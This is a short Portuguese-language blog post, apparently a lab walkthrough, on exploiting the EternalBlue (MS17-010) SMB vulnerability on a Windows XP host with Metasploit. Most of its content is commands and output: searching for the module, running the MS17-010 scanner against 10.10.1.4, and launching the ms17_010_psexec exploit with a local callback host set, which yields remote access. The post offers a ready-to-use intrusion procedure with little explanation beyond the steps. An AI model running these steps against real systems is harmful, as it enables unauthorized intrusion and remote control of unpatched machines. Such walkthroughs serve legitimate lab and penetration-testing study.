Archive:

Exploits - Eternal Blue at Windows XP

d0x75 post

O EternalBlue é um exploit de ataque cibernético desenvolvido pela Agência de Segurança Nacional dos Estados Unidos da América. Foi divulgado pelo grupo de hackers Shadow Brokers em 14 de abril de 2017, um mês depois que a Microsoft lançou correções para a vulnerabilidade. by : Wikipédia

Explorando o EternalBlue WindowsXP

  • Primeiro vamos entrar no metasploit logando com o msfconsole e procurar a Vulnerabilidade em questão.
msfconsole
msf6 > search eternalblue

or

msfconsole
msf6 > search ms17-010
  • Agora temos que ter o host do alvo, para verificarmos se o alvo é um target Windows XP e se está vulnerável. Nesse caso o host é : 10.10.1.4
use auxiliary/scanner/smb/smb_ms17_010
set RHOST 10.10.1.4
exploit
  • Se tudo der certo, obtemos uma resposta parecida com o seguinte:
[+] 10.l0.1.4:445      - Host is likely VULNERABLE to MS17-010! - Windows 5.1
[*] 10.l0.1.4:445      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Explorando o host que identificamos que esta vulneravel

msf6 > back
msf6 > use exploit/windows/smb/ms17_010_psexec

set RHOST 10.10.1.4
set LHOST 10.10.1.2
run